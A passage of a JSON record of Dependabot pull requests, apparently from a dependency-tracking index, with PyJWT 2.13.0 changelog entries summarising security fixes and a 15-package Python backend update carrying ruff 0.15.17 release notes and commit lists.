`GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev2.12.1 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u0026amp;gt;\u003c/code\u003e__\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/a4e1a3d1218b01c5806420b8f16d9308ac4adc30\"\u003e\u003ccode\u003ea4e1a3d\u003c/code\u003e\u003c/a\u003e Add typing_extensions dependency for Python \u0026lt; 3.11 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1151\"\u003e#1151\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/bd9700cca7f9258fadcc429c1034e508025931f2\"\u003e\u003ccode\u003ebd9700c\u003c/code\u003e\u003c/a\u003e Use PyJWK algorithm when encoding without explicit algorithm (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1148\"\u003e#1148\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.10.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pyjwt\u0026package-manager=uv\u0026previous-version=2.10.1\u0026new-version=2.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/Smitbafna/Eventora/pull/27","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Smitbafna%2FEventora/issues/27","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/27/packages"},{"uuid":"4657421193","node_id":"PR_kwDOQedBh87mKHET","number":585,"state":"open","title":"chore(deps): bump the pip-backend-patch-minor group across 1 directory with 15 updates","user":"dependabot[bot]","labels":["dependencies","type:chore","area:backend","area:ci"],"assignees":[],"locked":false,"comments_count":9,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-14T00:34:24.000Z","updated_at":"2026-06-14T00:38:40.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"pip-backend-patch-minor","update_count":15,"packages":[{"name":"ruff","old_version":"0.15.10","new_version":"0.15.17","repository_url":"https://github.com/astral-sh/ruff"},{"name":"mypy","old_version":"1.20.0","new_version":"1.20.2","repository_url":"https://github.com/python/mypy"},{"name":"pip-audit","old_version":"2.10.0","new_version":"2.10.1","repository_url":"https://github.com/pypa/pip-audit"},{"name":"coverage","old_version":"7.13.5","new_version":"7.14.1","repository_url":"https://github.com/coveragepy/coveragepy"},{"name":"fastapi","old_version":"0.135.3","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"pydantic-settings","old_version":"2.13.1","new_version":"2.14.1","repository_url":"https://github.com/pydantic/pydantic-settings"},{"name":"sqlalchemy","old_version":"2.0.49","new_version":"2.0.50","repository_url":"https://github.com/sqlalchemy/sqlalchemy"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"python-multipart","old_version":"0.0.26","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"redis","old_version":"7.4.0","new_version":"7.4.1","repository_url":"https://github.com/redis/redis-py"},{"name":"pytest","old_version":"9.0.3","new_version":"9.1.0","repository_url":"https://github.com/pytest-dev/pytest"},{"name":"reportlab","old_version":"4.4.10","new_version":"4.5.1"},{"name":"sentry-sdk","old_version":"2.57.0","new_version":"2.62.0","repository_url":"https://github.com/getsentry/sentry-python"},{"name":"webauthn","old_version":"2.7.1","new_version":"2.8.0","repository_url":"https://github.com/duo-labs/py_webauthn"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip-backend-patch-minor group with 15 updates in the /backend directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.10` | `0.15.17` |\n| [mypy](https://github.com/python/mypy) | `1.20.0` | `1.20.2` |\n| [pip-audit](https://github.com/pypa/pip-audit) | `2.10.0` | `2.10.1` |\n| [coverage](https://github.com/coveragepy/coveragepy) | `7.13.5` | `7.14.1` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.135.3` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.49.0` |\n| [pydantic-settings](https://github.com/pydantic/pydantic-settings) | `2.13.1` | `2.14.1` |\n| [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) | `2.0.49` | `2.0.50` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.26` | `0.0.32` |\n| [redis](https://github.com/redis/redis-py) | `7.4.0` | `7.4.1` |\n| [pytest](https://github.com/pytest-dev/pytest) | `9.0.3` | `9.1.0` |\n| [reportlab](https://www.reportlab.com/) | `4.4.10` | `4.5.1` |\n| [sentry-sdk](https://github.com/getsentry/sentry-python) | `2.57.0` | `2.62.0` |\n| [webauthn](https://github.com/duo-labs/py_webauthn) | `2.7.1` | `2.8.0` |\n\n\nUpdates `ruff` from 0.15.10 to 0.15.17\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ruff/releases\"\u003eruff's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.15.17\u003c/h2\u003e\n\u003ch2\u003eRelease Notes\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-11.\u003c/p\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow human-readable names in suppression comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25614\"\u003e#25614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix handling of \u003ccode\u003eignore\u003c/code\u003e comments within a \u003ccode\u003edisable\u003c/code\u003e/\u003ccode\u003eenable\u003c/code\u003e pair (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25845\"\u003e#25845\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrioritize human-readable names in CLI output (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25869\"\u003e#25869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRespect diagnostic start and parent ranges and trailing comments in \u003ccode\u003eruff:ignore\u003c/code\u003e suppressions (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25673\"\u003e#25673\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-async\u003c/code\u003e] Add \u003ccode\u003etrio.as_safe_channel\u003c/code\u003e to safe decorators (\u003ccode\u003eASYNC119\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25775\"\u003e#25775\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Also check \u003ccode\u003epytest_asyncio\u003c/code\u003e fixtures (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25375\"\u003e#25375\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Ban \u003ccode\u003epytest\u003c/code\u003e autouse fixtures (\u003ccode\u003eRUF076\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25477\"\u003e#25477\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Add \u003ccode\u003efrom __future__ import annotations\u003c/code\u003e automatically (\u003ccode\u003eUP007\u003c/code\u003e, \u003ccode\u003eUP045\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/23259\"\u003e#23259\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix diagnostic when \u003ccode\u003eruff:enable\u003c/code\u003e or \u003ccode\u003eruff:disable\u003c/code\u003e appears where \u003ccode\u003eruff:ignore\u003c/code\u003e is expected (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25700\"\u003e#25700\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Preserve leading empty literals to avoid syntax errors (\u003ccode\u003eUP032\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25491\"\u003e#25491\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRule changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Clarify diagnostic message for single parameters (\u003ccode\u003ePT007\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25592\"\u003e#25592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003enumpy\u003c/code\u003e] Drop autofix for \u003ccode\u003enp.in1d\u003c/code\u003e (\u003ccode\u003eNPY201\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25612\"\u003e#25612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Exempt Python version comparisons (\u003ccode\u003ePLR2004\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25743\"\u003e#25743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReserve AST \u003ccode\u003eVec\u003c/code\u003es with correct capacity for common cases (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25451\"\u003e#25451\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFormatter\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve whitespace for Quarto cell option comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25641\"\u003e#25641\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCLI\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow rule names in \u003ccode\u003eruff rule\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25640\"\u003e#25640\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix playground diagnostics scrollbars (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25642\"\u003e#25642\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/SuryanshSS1011\"\u003e\u003ccode\u003e@​SuryanshSS1011\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anishgirianish\"\u003e\u003ccode\u003e@​anishgirianish\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/romero-deshaw\"\u003e\u003ccode\u003e@​romero-deshaw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/karlhillx\"\u003e\u003ccode\u003e@​karlhillx\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/carljm\"\u003e\u003ccode\u003e@​carljm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md\"\u003eruff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.15.17\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-11.\u003c/p\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow human-readable names in suppression comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25614\"\u003e#25614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix handling of \u003ccode\u003eignore\u003c/code\u003e comments within a \u003ccode\u003edisable\u003c/code\u003e/\u003ccode\u003eenable\u003c/code\u003e pair (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25845\"\u003e#25845\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrioritize human-readable names in CLI output (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25869\"\u003e#25869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRespect diagnostic start and parent ranges and trailing comments in \u003ccode\u003eruff:ignore\u003c/code\u003e suppressions (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25673\"\u003e#25673\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-async\u003c/code\u003e] Add \u003ccode\u003etrio.as_safe_channel\u003c/code\u003e to safe decorators (\u003ccode\u003eASYNC119\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25775\"\u003e#25775\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Also check \u003ccode\u003epytest_asyncio\u003c/code\u003e fixtures (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25375\"\u003e#25375\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Ban \u003ccode\u003epytest\u003c/code\u003e autouse fixtures (\u003ccode\u003eRUF076\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25477\"\u003e#25477\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Add \u003ccode\u003efrom __future__ import annotations\u003c/code\u003e automatically (\u003ccode\u003eUP007\u003c/code\u003e, \u003ccode\u003eUP045\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/23259\"\u003e#23259\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix diagnostic when \u003ccode\u003eruff:enable\u003c/code\u003e or \u003ccode\u003eruff:disable\u003c/code\u003e appears where \u003ccode\u003eruff:ignore\u003c/code\u003e is expected (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25700\"\u003e#25700\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Preserve leading empty literals to avoid syntax errors (\u003ccode\u003eUP032\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25491\"\u003e#25491\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRule changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Clarify diagnostic message for single parameters (\u003ccode\u003ePT007\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25592\"\u003e#25592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003enumpy\u003c/code\u003e] Drop autofix for \u003ccode\u003enp.in1d\u003c/code\u003e (\u003ccode\u003eNPY201\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25612\"\u003e#25612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Exempt Python version comparisons (\u003ccode\u003ePLR2004\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25743\"\u003e#25743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReserve AST \u003ccode\u003eVec\u003c/code\u003es with correct capacity for common cases (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25451\"\u003e#25451\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFormatter\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve whitespace for Quarto cell option comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25641\"\u003e#25641\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCLI\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow rule names in \u003ccode\u003eruff rule\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25640\"\u003e#25640\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix playground diagnostics scrollbars (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25642\"\u003e#25642\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/SuryanshSS1011\"\u003e\u003ccode\u003e@​SuryanshSS1011\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anishgirianish\"\u003e\u003ccode\u003e@​anishgirianish\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/romero-deshaw\"\u003e\u003ccode\u003e@​romero-deshaw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/karlhillx\"\u003e\u003ccode\u003e@​karlhillx\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/carljm\"\u003e\u003ccode\u003e@​carljm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ntBre\"\u003e\u003ccode\u003e@​ntBre\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/7c645a9a1be8258b9f9e005208a55a0b7e8e18f0\"\u003e\u003ccode\u003e7c645a9\u003c/code\u003e\u003c/a\u003e Bump 0.15.17 (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25872\"\u003e#25872\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/f381eb1d54997cfbfa6f63c15dd2d760f70e85e1\"\u003e\u003ccode\u003ef381eb1\u003c/code\u003e\u003c/a\u003e Prioritize human-readable names in CLI output (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25869\"\u003e#25869\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/b9b4546ad27d8fd12acc979e312a3ee25ef8ac4f\"\u003e\u003ccode\u003eb9b4546\u003c/code\u003e\u003c/a\u003e Minor workflow simplification (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25870\"\u003e#25870\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/1e77ba02570bbe4952f7cf0e4ebb97b8b4e6e58d\"\u003e\u003ccode\u003e1e77ba0\u003c/code\u003e\u003c/a\u003e [ty] Move \u003ccode\u003ePreformattedBlockScanner\u003c/code\u003e to format-agnostic location. (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25856\"\u003e#25856\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/6f2b772285aa478e8aee3f4b54dfa9ce903a0ce1\"\u003e\u003ccode\u003e6f2b772\u003c/code\u003e\u003c/a\u003e [ty] Preserve nominal type of enum.property instances (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25849\"\u003e#25849\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/be4777c8766a38d405a69948989cdfa2674adaae\"\u003e\u003ccode\u003ebe4777c\u003c/code\u003e\u003c/a\u003e [ty] Fix site-package error when multiple versions of pythons are installed i...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/53f6ff7200983a67778fcba7106019d2615846f0\"\u003e\u003ccode\u003e53f6ff7\u003c/code\u003e\u003c/a\u003e Allow human-readable names in suppression comments (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25614\"\u003e#25614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/67403254192f3541bd7e1027c8f1805cf7a9c2be\"\u003e\u003ccode\u003e6740325\u003c/code\u003e\u003c/a\u003e [ty] Restrict uncached raw signature access (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25866\"\u003e#25866\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/970b1bf4a4d83359c9e28cad5f127ebbd6769682\"\u003e\u003ccode\u003e970b1bf\u003c/code\u003e\u003c/a\u003e Auto-update snapshots when syncing typeshed (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25841\"\u003e#25841\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/0785793750fd6c74124a189259822f1a28eb5c13\"\u003e\u003ccode\u003e0785793\u003c/code\u003e\u003c/a\u003e Fix handling of \u003ccode\u003eignore\u003c/code\u003e comments within a \u003ccode\u003edisable\u003c/code\u003e/\u003ccode\u003eenable\u003c/code\u003e pair (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25845\"\u003e#25845\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/astral-sh/ruff/compare/0.15.10...0.15.17\"\u003ecompare 